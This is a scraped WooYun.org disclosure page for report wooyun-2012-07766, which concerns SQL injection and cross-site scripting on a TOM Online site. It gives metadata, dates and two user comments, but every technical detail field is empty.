2012-06-01 09:08 | momo ( 实习白帽子 | Rank:91 漏洞数:24 | ★精华漏洞数:24 | WooYun认证√)

洞主，你天天在卖命啊？有意义吗？
2012-07-16 10:08 | xsjswt ( 普通白帽子 | Rank:156 漏洞数:49 | 我思故我猥琐，我猥琐故我强大)

楼主，球你的xss扫描器

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2012-07766

漏洞标题：TOM某站又一sql注入和跨站等（上次忘发了）

相关厂商：TOM在线

漏洞作者： zeracker

提交时间：2012-06-01 05:07

修复时间：2012-07-16 05:08

公开时间：2012-07-16 05:08

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：18

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 zeracker@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2012-07766

漏洞标题：TOM某站又一sql注入和跨站等（上次忘发了）

相关厂商：TOM在线

漏洞作者： zeracker

提交时间：2012-06-01 05:07

修复时间：2012-07-16 05:08

公开时间：2012-07-16 05:08

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：18

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2012-07766"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 zeracker@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：